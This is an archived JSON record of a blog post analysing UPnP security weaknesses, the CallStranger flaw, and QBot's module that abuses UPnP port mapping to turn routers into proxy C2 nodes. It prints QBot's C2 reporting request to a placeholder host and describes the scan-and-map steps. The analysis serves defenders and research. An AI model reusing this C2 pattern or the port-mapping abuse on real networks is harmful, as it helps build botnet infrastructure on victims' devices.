{
	"id": "b3ebfed5-2a74-4706-93e6-b8af8302894e",
	"created_at": "2026-04-06T01:29:25.029889Z",
	"updated_at": "2026-04-10T03:21:23.497528Z",
	"deleted_at": null,
	"sha1_hash": "fdde746def670ece37e9d7682c01e460421632d7",
	"title": "UpnP – Messing up Security since years",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 647125,
	"plain_text": "UpnP – Messing up Security since years\r\nPublished: 2020-06-21 · Archived: 2026-04-06 00:57:42 UTC\r\nUpnP is a set of networking protocols to permit network devices to discover each other’s presence on a network\r\nand establish services for various functionalities.\r\nToo lazy to port forward yourself ? Just enable UpnP to automatically establish working configurations with\r\ndevices! Dynamic device configuration like this makes our life more comfortable for sure. Sadly it also comes\r\nwith many security issues.\r\nIn this blog article I am focusing on mentioning the stages of the UpnP protocol, a quick introduction to security\r\nissues regarding UpnP and how QBot abuses the UpnP protocol to exploit devices as proxy C2 servers.\r\nUpnP in a nutshell\r\nUpnP takes usage of common networking protocols and stacks HTTP , SOAP and XML on top of the IP\r\nprotocol in order to provide a variety of functionalities for users. Without going to deep into how UpnP works in\r\ndetail, the following figure is enough for the basics.\r\nhttps://malwareandstuff.com/upnp-messing-up-security-since-years/\r\nPage 1 of 5\n\nQuick explanation of existing stages in UpnP protocol\r\nSome services a node with UpnP enabled can offer (it really depends on the device):\r\nPort forwarding\r\nSwitching power on and off for light bulbs\r\netc.\r\nThis is very high level of course. If you are interested in everything about UpnP, I recommend you to check out\r\nWikipedia[1] for a high level introduction or read this report that goes more into detail[2].\r\nFor the following content of this blog article, only the first three stages are really relevant.\r\nIoT Security and UpnP\r\nMisconfiguration\r\nAgain, while it might be very convenient for customers to have devices autoconfigure themselves, it leads to huge\r\nsecurity risks.\r\nhttps://malwareandstuff.com/upnp-messing-up-security-since-years/\r\nPage 2 of 5\n\nMany routers have UpnP enabled by default. Think of misconfigured IoT devices that sends a command to port\r\nforward a specific port, leading to a port exposure to the internet.\r\nIt is known that many IoT devices contain awful security flaws like default credentials for telnet. If devices like\r\nthis have such misconfigurations and expose its telnet port to the outside, it probably takes about 5 minutes till\r\nsome script kiddie adds this device to its botnet.\r\nExploitation\r\nA blog post from TrendMicro[3] previously mentioned that many devices still use very old UpnP libraries which\r\nare not up to date to current security standards. This creates a larger attack surface for attackers. The newest one\r\nbeing CallStranger .\r\nsource : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12695\r\nIt is caused by the Callback header value in the UpnP SUBSCRIBE function. This field can be controlled by an\r\nattacker and enabled a Server Side Request Forgery like vulnerability. It can be used for the following\r\nmalicious cases:\r\nExfilitrate data\r\nScan networks\r\nForce nodes to participate in DDoS attacks\r\nI recommend you to visit the official domain[4] of this vulnerability, if you want gain more knowledge about this\r\nvulnerability.\r\nUpnP abused by QBot\r\nSecurity risks created by UpnP are not limited to the IoT landscape of course.\r\nAnother method to use UpnP for malicious cases is to install Proxy C2 servers on devices which have the\r\nmentioned protocol enabled, like QBot does for example. Let’s take a look at how this is done.\r\nDiving into QBot’s UpnP proxy module\r\nThis technique was first discovered by McAfee[4] in 2017. First QBot starts scanning for devices which have\r\nUpnP enabled and is one of the following device types:\r\nhttps://malwareandstuff.com/upnp-messing-up-security-since-years/\r\nPage 3 of 5\n\nurn:schemas-upnp-org:device:InternetGatewayDevice:1\r\nurn:schemas-upnp-org:service:WANIPConnection:1\r\nurn:schemas-upnp-org:service:WANPPPConnection:1\r\nupnp:rootdevice\r\nDisassembly of strcmp calls to check for device type\r\nIf you are using INETSIM for malware analysis, you will probably realise that it does not offer any functionality\r\nto fake a SSDP or UpnP service in any way. However, we can use this python script[5] by user GrahamCobb\r\nwhich emulates a fake SSDP service and adjust the device description to suit our needs.\r\nOnce the devices are discovered, it sends requests for device descriptions and checks whether it deals with an\r\ninternet gateway device. This can be determined by looking at the device description itself.\r\nCapture SSDP traffic, showing the MSEARCH request and retrieval of the device description\r\nhttps://malwareandstuff.com/upnp-messing-up-security-since-years/\r\nPage 4 of 5\n\nIf it is an internet gateway device, it confirms whether a connection exists by sending a GetStatusInfo followed\r\nby retrieving the external ip address of this device by sending the GetExternalIPAddress command.\r\nNext it tries to use the AddPortMapping command to add port forwarding rules to the device.\r\nPort forwarding command sent to fake SSDP service\r\nAfterwards all rules are removed again and the ports which were successfully port forwarded are sent as a HTTP-POST to the C2 server.\r\nThe carrier protocol is HTTPS and the response is sent in the following form:\r\n# destination address\r\nhttps://[HARDCODED_IP]:[HARDCODED_PORT]/bot_serv\r\n# POST DATA form, successful port forwarded ports are appended to ports\r\ncmd=1\u0026msg=%s\u0026ports=\r\nFrom this point on, my analysis stopped for now. However, McAfee explains that a new binary is downloaded\r\nfrom the contacted C2 server, which re-adds the port forwarding rules and is responsible for the C2\r\ncommunication. The blog article I’ve referenced above explains the whole functionality, so I recommend you to\r\ntake a look at it, if you are interested in the next steps.\r\nFinal Words\r\nAs you can see UpnP contains many security flaws and can lead to a compromised network. If you have UpnP\r\nenabled in your company’s network, I really recommend to check whether this is really needed and turn it off if it\r\nis not necessary.\r\nSo exams at university are coming up next, it will probably take some time until I can get my hands on the QBot\r\nC2 protocol or the proxy binary. I do however, want to look at these two functionalities next.\r\nSource: https://malwareandstuff.com/upnp-messing-up-security-since-years/\r\nhttps://malwareandstuff.com/upnp-messing-up-security-since-years/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://malwareandstuff.com/upnp-messing-up-security-since-years/"
	],
	"report_names": [
		"upnp-messing-up-security-since-years"
	],
	"threat_actors": [],
	"ts_created_at": 1775438965,
	"ts_updated_at": 1775791283,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fdde746def670ece37e9d7682c01e460421632d7.pdf",
		"text": "https://archive.orkl.eu/fdde746def670ece37e9d7682c01e460421632d7.txt",
		"img": "https://archive.orkl.eu/fdde746def670ece37e9d7682c01e460421632d7.jpg"
	}
}